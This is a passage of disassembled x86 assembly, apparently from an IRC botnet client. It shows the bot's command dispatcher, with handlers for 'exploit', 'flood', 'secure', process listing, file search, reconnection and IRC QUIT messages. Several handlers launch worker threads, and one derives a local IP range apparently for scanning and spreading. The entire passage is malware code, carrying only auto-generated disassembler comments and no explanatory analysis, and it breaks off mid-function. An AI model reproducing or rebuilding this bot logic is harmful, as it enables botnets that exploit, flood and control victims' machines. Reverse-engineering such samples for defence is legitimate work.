loc_404ADD: ; CODE XREF: sub_40274D+2385�j
mov eax, [ebp+4Ch+arg_0]
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, edi
jnb short loc_404AF6
cmp edi, 0FFFFFFFFh
jnz loc_404979
loc_404AF6: ; CODE XREF: sub_40274D+239E�j
push ebx
call sub_41D5F8
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42EFE0 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
lea eax, [ebp+4Ch+Dst]
push eax
call sub_417D70
jmp loc_4083EA
; ---------------------------------------------------------------------------
loc_404B35: ; CODE XREF: sub_40274D+167D�j
; sub_40274D+1692�j
push [ebp+4Ch+var_4]
push [ebp+4Ch+Format]
push [ebp+4Ch+arg_4]
call sub_4185EA
lea eax, [ebp+4Ch+Dst]
push offset asc_42EFC0 ; "-"
push eax ; Dest
call _sprintf
jmp loc_408BF5
; ---------------------------------------------------------------------------
loc_404B59: ; CODE XREF: sub_40274D+1653�j
; sub_40274D+1668�j
push 27h
call sub_40B075
test eax, eax
pop ecx
jle short loc_404B87
cmp [ebp+4Ch+var_C], ebx
jnz loc_402B92
push ebx ; int
push [ebp+4Ch+var_4] ; int
push offset unk_42EFA0 ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
jmp loc_4095B1
; ---------------------------------------------------------------------------
loc_404B87: ; CODE XREF: sub_40274D+2416�j
push [ebp+4Ch+Format] ; Format
lea eax, [ebp+4Ch+var_BCC]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+4Ch+arg_4]
mov esi, dword ptr [ebp+esi+4Ch+Args]
mov [ebp+4Ch+var_BD0], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_B44], eax
mov eax, [ebp+4Ch+var_C]
add esp, 0Ch
cmp esi, ebx
mov [ebp+4Ch+var_B40], eax
mov [ebp+4Ch+var_B48], ebx
jz short loc_404BE2
push esi ; Str2
push offset aFull ; "full"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_404BE2
mov [ebp+4Ch+var_B48], 1
loc_404BE2: ; CODE XREF: sub_40274D+2478�j
; sub_40274D+2489�j
lea eax, [ebp+4Ch+Dst]
push offset asc_42EF7C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 27h ; int
push eax ; Source
call sub_40AE85
add esp, 14h
mov [ebp+4Ch+var_B4C], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_BD0]
push eax
push offset sub_41C66C
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_B4C]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_404C62
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42EF40 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_404A79
; ---------------------------------------------------------------------------
loc_404C5A: ; CODE XREF: sub_40274D+251B�j
push 32h
call ds:dword_42B014 ; Sleep
loc_404C62: ; CODE XREF: sub_40274D+24EB�j
cmp [ebp+4Ch+var_B3C], ebx
jz short loc_404C5A
jmp loc_404A79
; ---------------------------------------------------------------------------
loc_404C6F: ; CODE XREF: sub_40274D+1629�j
; sub_40274D+163E�j
cmp [ebp+4Ch+var_C], ebx
jnz short loc_404C8B
push ebx ; int
push [ebp+4Ch+var_4] ; int
push offset dword_42EF24 ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 14h
loc_404C8B: ; CODE XREF: sub_40274D+2525�j
push [ebp+4Ch+arg_4]
call dword_444218 ; closesocket
call dword_444224 ; WSACleanup
call sub_41AEDD
jmp loc_405462
; ---------------------------------------------------------------------------
loc_404CA4: ; CODE XREF: sub_40274D+15FF�j
; sub_40274D+1614�j
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push [ebp+4Ch+arg_4]
push eax
call sub_41D779
pop ecx
pop ecx
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
push offset dword_42EF08
jmp loc_404A12
; ---------------------------------------------------------------------------
loc_404CCF: ; CODE XREF: sub_40274D+15D5�j
; sub_40274D+15EA�j
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push [ebp+4Ch+arg_4]
push [ebp+4Ch+arg_1C]
push eax
call sub_41D9E5
add esp, 0Ch
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
push offset dword_42EEEC
jmp loc_404A12
; ---------------------------------------------------------------------------
loc_404CFE: ; CODE XREF: sub_40274D+15AB�j
; sub_40274D+15C0�j
push [ebp+4Ch+var_C] ; int
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_417E10
loc_404D0F: ; CODE XREF: sub_40274D+372�j
; sub_40274D+234E�j ...
add esp, 10h
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_404D17: ; CODE XREF: sub_40274D+1581�j
; sub_40274D+1596�j
cmp [ebp+4Ch+var_18], ebx
mov [ebp+4Ch+var_159C], bl
jz short loc_404D53
mov esi, dword ptr [ebp+esi+4Ch+Args]
cmp esi, ebx
jz short loc_404D53
push esi ; SubStr
push [ebp+4Ch+var_18] ; Str
call _strstr
cmp eax, ebx
pop ecx
pop ecx
jz short loc_404D53
push eax
push offset aS ; "%s"
lea eax, [ebp+4Ch+var_159C]
push 80h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
loc_404D53: ; CODE XREF: sub_40274D+25D3�j
; sub_40274D+25DB�j ...
push [ebp+4Ch+Format] ; Format
lea eax, [ebp+4Ch+var_161C]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_1620], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_1518], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_1514], eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42EED4 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 25h ; int
push eax ; Source
call sub_40AE85
add esp, 20h
mov [ebp+4Ch+var_151C], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_1620]
push eax
push offset sub_417E51
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_151C]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_404DF3
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42EE9C
jmp loc_40A211
; ---------------------------------------------------------------------------
loc_404DEB: ; CODE XREF: sub_40274D+26AC�j
push 32h
call ds:dword_42B014 ; Sleep
loc_404DF3: ; CODE XREF: sub_40274D+268B�j
cmp [ebp+4Ch+var_1510], ebx
jz short loc_404DEB
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_404E00: ; CODE XREF: sub_40274D+1557�j
; sub_40274D+156C�j
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_417CF8
push offset dword_42EE84
call sub_417D70
jmp loc_404976
; ---------------------------------------------------------------------------
loc_404E1D: ; CODE XREF: sub_40274D+152D�j
; sub_40274D+1542�j
push [ebp+4Ch+Format] ; Format
lea eax, [ebp+4Ch+var_B34]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+4Ch+arg_4]
mov esi, dword ptr [ebp+esi+4Ch+Args]
mov [ebp+4Ch+var_B38], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_AAC], eax
mov eax, [ebp+4Ch+var_C]
add esp, 0Ch
cmp esi, ebx
mov [ebp+4Ch+var_AA8], eax
jz short loc_404E71
push offset aSub ; "sub"
push esi ; Str1
call _strcmp
neg eax
sbb eax, eax
pop ecx
inc eax
pop ecx
mov [ebp+4Ch+var_AB0], eax
jmp short loc_404E77
; ---------------------------------------------------------------------------
loc_404E71: ; CODE XREF: sub_40274D+2708�j
mov [ebp+4Ch+var_AB0], ebx
loc_404E77: ; CODE XREF: sub_40274D+2722�j
lea eax, [ebp+4Ch+Dst]
push offset asc_42EE60 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 28h ; int
push eax ; Source
call sub_40AE85
add esp, 14h
mov [ebp+4Ch+var_AB4], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_B38]
push eax
push offset sub_40B186
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_AB4]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_404EE8
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42EE24
jmp loc_409AC1
; ---------------------------------------------------------------------------
loc_404EE0: ; CODE XREF: sub_40274D+27A1�j
push 32h
call ds:dword_42B014 ; Sleep
loc_404EE8: ; CODE XREF: sub_40274D+2780�j
cmp [ebp+4Ch+var_AA4], ebx
jz short loc_404EE0
jmp loc_406C6B
; ---------------------------------------------------------------------------
loc_404EF5: ; CODE XREF: sub_40274D+14B4�j
; sub_40274D+14C9�j
push offset aFicken ; "ficken"
lea eax, [ebp+4Ch+Dst]
push offset asc_42EE0C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 20h
jmp loc_406C6B
; ---------------------------------------------------------------------------
loc_404F29: ; CODE XREF: sub_40274D+148A�j
; sub_40274D+149F�j
push dword_4D1FD0
call sub_41D5F8
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42EDE0 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 24h
jmp loc_406C6B
; ---------------------------------------------------------------------------
loc_404F64: ; CODE XREF: sub_40274D+1460�j
; sub_40274D+1475�j
mov esi, dword ptr [ebp+esi+4Ch+Args]
cmp esi, ebx
jz short loc_404F93
cmp [ebp+4Ch+var_18], ebx
jz short loc_404FA2
push esi ; SubStr
push [ebp+4Ch+var_18] ; Str
call _strstr
cmp eax, ebx
pop ecx
pop ecx
jz short loc_404FA2
push eax ; Args
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
add esp, 0Ch
jmp short loc_404FA2
; ---------------------------------------------------------------------------
loc_404F93: ; CODE XREF: sub_40274D+281D�j
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
pop ecx
pop ecx
loc_404FA2: ; CODE XREF: sub_40274D+2822�j
; sub_40274D+2831�j ...
push 0FFFFFFFEh
pop eax
jmp loc_402B95
; ---------------------------------------------------------------------------
loc_404FAA: ; CODE XREF: sub_40274D+1436�j
; sub_40274D+144B�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
push offset dword_42ED90
call sub_417D70
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_402B95
; ---------------------------------------------------------------------------
loc_404FCC: ; CODE XREF: sub_40274D+140C�j
; sub_40274D+1421�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
push offset dword_42ED5C
call sub_417D70
add esp, 0Ch
loc_404FE6: ; CODE XREF: sub_40274D+7915�j
xor eax, eax
jmp loc_402B95
; ---------------------------------------------------------------------------
loc_404FED: ; CODE XREF: sub_40274D+13E2�j
; sub_40274D+13F7�j
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40B553
jmp loc_409DE9
; ---------------------------------------------------------------------------
loc_405000: ; CODE XREF: sub_40274D+13B8�j
; sub_40274D+13CD�j
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40B4FF
jmp loc_409DE9
; ---------------------------------------------------------------------------
loc_405013: ; CODE XREF: sub_40274D+138E�j
; sub_40274D+13A3�j
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40B494
jmp loc_409DE9
; ---------------------------------------------------------------------------
loc_405026: ; CODE XREF: sub_40274D+1364�j
; sub_40274D+1379�j
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40B3C5
jmp loc_409DE9
; ---------------------------------------------------------------------------
loc_405039: ; CODE XREF: sub_40274D+12C8�j
; sub_40274D+12DD�j
push dword ptr [ebp+esi+4Ch+Args]
push 27h
push offset aProcessList ; "Process list"
push offset dword_42ED3C
jmp short loc_40505B
; ---------------------------------------------------------------------------
loc_40504B: ; CODE XREF: sub_40274D+129E�j
; sub_40274D+12B3�j
push dword ptr [ebp+esi+4Ch+Args] ; Str
push 24h ; int
push offset aFindFile ; "Find file"
push offset dword_42ED20 ; int
loc_40505B: ; CODE XREF: sub_40274D+EF1�j
; sub_40274D+F41�j ...
push [ebp+4Ch+var_C] ; int
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; int
push [ebp+4Ch+arg_4] ; int
call sub_40B0BB
add esp, 20h
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_405074: ; CODE XREF: sub_40274D+F05�j
; sub_40274D+F1A�j
mov edi, dword ptr [ebp+esi+4Ch+Args]
cmp edi, ebx
jz short loc_405090
push edi ; Str
call j__atol
test eax, eax
pop ecx
jz short loc_405090
push edi ; Str
call j__atol
pop ecx
jmp short loc_405095
; ---------------------------------------------------------------------------
loc_405090: ; CODE XREF: sub_40274D+292D�j
; sub_40274D+2938�j
mov eax, dword_43C070
loc_405095: ; CODE XREF: sub_40274D+2941�j
mov esi, [ebp+esi+4Ch+Format]
cmp esi, ebx
mov [ebp+4Ch+var_598], eax
jz short loc_4050B7
push esi ; Format
loc_4050A4: ; CODE XREF: sub_40274D+2979�j
lea eax, [ebp+4Ch+var_5A8]
push 10h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_4050CE
; ---------------------------------------------------------------------------
loc_4050B7: ; CODE XREF: sub_40274D+2954�j
cmp [ebp+4Ch+var_907], bl
jz short loc_4050C8
lea eax, [ebp+4Ch+var_D0]
push eax
jmp short loc_4050A4
; ---------------------------------------------------------------------------
loc_4050C8: ; CODE XREF: sub_40274D+2970�j
mov [ebp+4Ch+var_5A8], bl
loc_4050CE: ; CODE XREF: sub_40274D+2968�j
mov eax, [ebp+4Ch+var_4]
push [ebp+4Ch+Format] ; Format
mov esi, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_58C], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_588], eax
lea eax, [ebp+4Ch+var_628]
push 80h ; Count
push eax ; Dest
mov [ebp+4Ch+var_62C], esi
call __snprintf
add esp, 0Ch
push [ebp+4Ch+var_598]
push esi
call sub_4023C9
pop ecx
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42ECF8 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 19h ; int
push eax ; Source
call sub_40AE85
add esp, 1Ch
mov [ebp+4Ch+var_594], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_62C]
push eax
push offset sub_4144B2
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_594]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_40517F
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset dword_42ECBC
jmp loc_40A211
; ---------------------------------------------------------------------------
loc_405177: ; CODE XREF: sub_40274D+2A38�j
push 32h
call ds:dword_42B014 ; Sleep
loc_40517F: ; CODE XREF: sub_40274D+2A17�j
cmp [ebp+4Ch+var_584], ebx
jz short loc_405177
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_40518C: ; CODE XREF: sub_40274D+EB5�j
; sub_40274D+ECA�j
mov esi, dword ptr [ebp+esi+4Ch+Args]
cmp esi, ebx
jz short loc_4051A9
push esi ; Str
call j__atol
test ax, ax
pop ecx
jz short loc_4051A9
push esi ; Str
call j__atol
pop ecx
jmp short loc_4051AF
; ---------------------------------------------------------------------------
loc_4051A9: ; CODE XREF: sub_40274D+2A45�j
; sub_40274D+2A51�j
mov ax, word_43C080
loc_4051AF: ; CODE XREF: sub_40274D+2A5A�j
push [ebp+4Ch+Format] ; Format
mov esi, [ebp+4Ch+arg_4]
mov edi, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_984], ax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_974], eax
lea eax, [ebp+4Ch+var_A04]
push 80h ; Count
push eax ; Dest
mov [ebp+4Ch+var_A08], esi
mov [ebp+4Ch+var_978], edi
call __snprintf
movzx eax, [ebp+4Ch+var_984]
add esp, 0Ch
push eax
push esi
call sub_4023C9
pop ecx
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42EC90 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
push edi ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push esi ; int
call sub_40123B
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 6 ; int
push eax ; Source
call sub_40AE85
add esp, 30h
mov [ebp+4Ch+var_980], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_A08]
push eax
push offset sub_411555
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_980]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_40527B
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42EC50
jmp loc_40A211
; ---------------------------------------------------------------------------
loc_405273: ; CODE XREF: sub_40274D+2B34�j
push 32h
call ds:dword_42B014 ; Sleep
loc_40527B: ; CODE XREF: sub_40274D+2B13�j
cmp [ebp+4Ch+var_970], ebx
jz short loc_405273
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_405288: ; CODE XREF: sub_40274D+E61�j
; sub_40274D+E76�j ...
push edi ; Str2
push offset aSecure ; "secure"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_4052B0
push edi ; Str2
push offset aSec ; "sec"
call _strcmp
test eax, eax
pop ecx
pop ecx
mov [ebp+4Ch+var_A18], ebx
jnz short loc_4052BA
loc_4052B0: ; CODE XREF: sub_40274D+2B4A�j
mov [ebp+4Ch+var_A18], 1
loc_4052BA: ; CODE XREF: sub_40274D+2B61�j
push [ebp+4Ch+Format] ; Format
lea eax, [ebp+4Ch+var_A9C]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_AA0], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_A14], eax
mov eax, [ebp+4Ch+var_C]
add esp, 0Ch
cmp [ebp+4Ch+var_A18], ebx
mov [ebp+4Ch+var_A10], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_4052FE
mov eax, offset aUnsecuring ; "Unsecuring"
loc_4052FE: ; CODE XREF: sub_40274D+2BAA�j
push eax
push offset asc_42EC1C ; "-"
lea eax, [ebp+4Ch+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 22h ; int
push eax ; Source
call sub_40AE85
add esp, 1Ch
mov [ebp+4Ch+var_A1C], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_AA0]
push eax
push offset sub_41D1C3
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_A1C]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_405375
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset dword_42EBE0
jmp loc_408D01
; ---------------------------------------------------------------------------
loc_40536D: ; CODE XREF: sub_40274D+2C2E�j
push 32h
call ds:dword_42B014 ; Sleep
loc_405375: ; CODE XREF: sub_40274D+2C0D�j
cmp [ebp+4Ch+var_A0C], ebx
jz short loc_40536D
jmp loc_408D10
; ---------------------------------------------------------------------------
loc_405382: ; CODE XREF: sub_40274D+E37�j
; sub_40274D+E4C�j
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_41D41B
jmp loc_409DE9
; ---------------------------------------------------------------------------
loc_405395: ; CODE XREF: sub_40274D+E0D�j
; sub_40274D+E22�j
push offset unk_42EB30
jmp loc_406C3F
; ---------------------------------------------------------------------------
loc_40539F: ; CODE XREF: sub_40274D+DE3�j
; sub_40274D+DF8�j
push offset aBloodRep ; "blood-rep"
push offset dword_42EB1C
jmp loc_4076D4
; ---------------------------------------------------------------------------
loc_4053AE: ; CODE XREF: sub_40274D+DB9�j
; sub_40274D+DCE�j
mov esi, dword ptr [ebp+esi+4Ch+Args]
cmp esi, ebx
jz short loc_405407
push esi ; Str
call j__atol
cmp eax, ebx
pop ecx
jl short loc_4053FC
cmp eax, 3
jge short loc_4053FC
mov edx, [ebp+4Ch+Str1]
mov ecx, eax
shl ecx, 7
lea esi, [ecx+edx]
cmp [esi], bl
jz short loc_4053F1
lea eax, [esi+1]
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42FDE8 ; "-"
push eax ; Dest
call _sprintf
mov [esi], bl
jmp loc_40698A
; ---------------------------------------------------------------------------
loc_4053F1: ; CODE XREF: sub_40274D+2C86�j
push eax
push offset unk_42EAF0
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_4053FC: ; CODE XREF: sub_40274D+2C72�j
; sub_40274D+2C77�j
push eax
push offset unk_42EAC4
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_405407: ; CODE XREF: sub_40274D+2C67�j
mov edi, [ebp+4Ch+Str1]
xor esi, esi
loc_40540C: ; CODE XREF: sub_40274D+2CD8�j
push [ebp+4Ch+Str2] ; Str2
push edi ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_40542C
inc esi
add edi, 80h
cmp esi, 3
jl short loc_40540C
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_40542C: ; CODE XREF: sub_40274D+2CCC�j
mov eax, [ebp+4Ch+Str1]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+4Ch+var_D0]
push eax
push offset asc_42FDE8 ; "-"
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_405446: ; CODE XREF: sub_40274D+D8F�j
; sub_40274D+DA4�j
push dword ptr [ebp+4Ch+Args] ; Str2
push offset a332 ; "332"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_403F48
call sub_40AFF6
loc_405462: ; CODE XREF: sub_40274D+2552�j
push ebx
call ds:dword_42B000 ; ExitProcess
loc_405469: ; CODE XREF: sub_40274D+1831�j
push offset aGet_1 ; "get"
push esi ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_40550F
cmp dword_4D5898, ebx
jz short loc_405495
push offset byte_4D5698
push offset asc_42EA88 ; "-"
jmp loc_405521
; ---------------------------------------------------------------------------
loc_405495: ; CODE XREF: sub_40274D+2D37�j
push 10h
pop eax
push eax ; Size
mov [ebp+4Ch+var_2D8], eax
lea eax, [ebp+4Ch+var_2F0]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+4Ch+var_2D8]
push eax
lea eax, [ebp+4Ch+var_2F0]
push eax
push [ebp+4Ch+arg_4]
call ds:dword_42B220 ; getsockname
movzx eax, [ebp+4Ch+var_2EA]
push eax
movzx eax, [ebp+4Ch+var_2EB]
push eax
movzx eax, [ebp+4Ch+var_2EC]
push eax
lea eax, [ebp+4Ch+var_DB8]
push offset aD_D_D_ ; "%d.%d.%d.*"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+var_DB8]
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42EA88 ; "-"
push eax ; Dest
call _sprintf
add esp, 20h
jmp loc_403F9D
; ---------------------------------------------------------------------------
loc_40550F: ; CODE XREF: sub_40274D+2D2B�j
push esi
call dword_44417C ; inet_addr
cmp eax, 0FFFFFFFFh
push esi
jnz short loc_405535
push offset asc_42EA48 ; "-"
loc_405521: ; CODE XREF: sub_40274D+2D43�j
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_403F9D
; ---------------------------------------------------------------------------
loc_405535: ; CODE XREF: sub_40274D+2DCD�j
push offset byte_4D5698 ; Dest
call _strcpy
push esi
lea eax, [ebp+4Ch+Dst]
push offset asc_42EA1C ; "-"
push eax ; Dest
mov dword_4D5898, 1
call _sprintf
add esp, 14h
jmp loc_403F9D
; ---------------------------------------------------------------------------
loc_405563: ; CODE XREF: sub_40274D+1819�j
push edi ; Str2
push offset aExploit ; "exploit"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_40565C
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_13EC], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_13E8], eax
mov eax, [ebp+4Ch+arg_4]
mov esi, offset a_fast__1 ; "#.fast.#"
push esi ; Format
mov [ebp+4Ch+var_13FC], eax
mov edi, 80h
lea eax, [ebp+4Ch+var_147C]
push edi ; Count
push eax ; Dest
mov [ebp+4Ch+var_13F4], 1
call __snprintf
push esi ; Format
lea eax, [ebp+4Ch+var_14FC]
push edi ; Count
push eax ; Dest
call __snprintf
push [ebp+4Ch+var_8] ; Format
lea eax, [ebp+4Ch+var_150C]
push 10h ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+4Ch+var_150C]
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42E9E4 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 8 ; int
push eax ; Source
call sub_40AE85
add esp, 3Ch
mov [ebp+4Ch+var_13F0], eax
lea eax, [ebp+4Ch+var_304]
push eax
push ebx
lea eax, [ebp+4Ch+var_150C]
push eax
push offset sub_40C15B
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_13F0]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_40564F
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42E9A4
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_405647: ; CODE XREF: sub_40274D+2F08�j
push 32h
call ds:dword_42B014 ; Sleep
loc_40564F: ; CODE XREF: sub_40274D+2EE7�j
cmp [ebp+4Ch+var_13E4], ebx
jz short loc_405647
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_40565C: ; CODE XREF: sub_40274D+2E25�j
push edi ; Str2
push offset aReconnect_in ; "reconnect.in"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40A01D
push edi ; Str2
push offset aRin ; "rin"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40A01D
push edi ; Str2
push offset aReconnect_in_m ; "reconnect.in.ms"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409FE3
push edi ; Str2
push offset aRinms ; "rinms"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409FE3
push [ebp+4Ch+var_10] ; Str2
push offset aFlood ; "flood"
call _strcmp
test eax, eax
mov edi, ds:dword_42B014
pop ecx
pop ecx
jnz loc_406175
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
push [ebp+4Ch+var_8] ; Str2
push offset aLoad ; "load"
call _strcmp
add esp, 0Ch
test eax, eax
jnz short loc_405750
cmp [ebp+esi+4Ch+var_94], ebx
jz short loc_405750
push [ebp+esi+4Ch+var_94] ; Str
call j__atol
pop ecx
push eax ; int
push [ebp+esi+4Ch+var_98] ; Str
call j__atol
pop ecx
push eax ; int
push [ebp+esi+4Ch+Format] ; Source
call sub_41A954
push [ebp+esi+4Ch+var_98]
lea eax, [ebp+4Ch+Dst]
push [ebp+esi+4Ch+Format]
push [ebp+esi+4Ch+var_94]
push offset asc_42E93C ; "-"
push eax ; Dest
call _sprintf
add esp, 20h
cmp [ebp+4Ch+var_C], ebx
jnz short loc_405750
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 14h
loc_405750: ; CODE XREF: sub_40274D+2F9E�j
; sub_40274D+2FA4�j ...
push [ebp+4Ch+var_8] ; Str2
push offset aPm ; "pm"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_4057B3
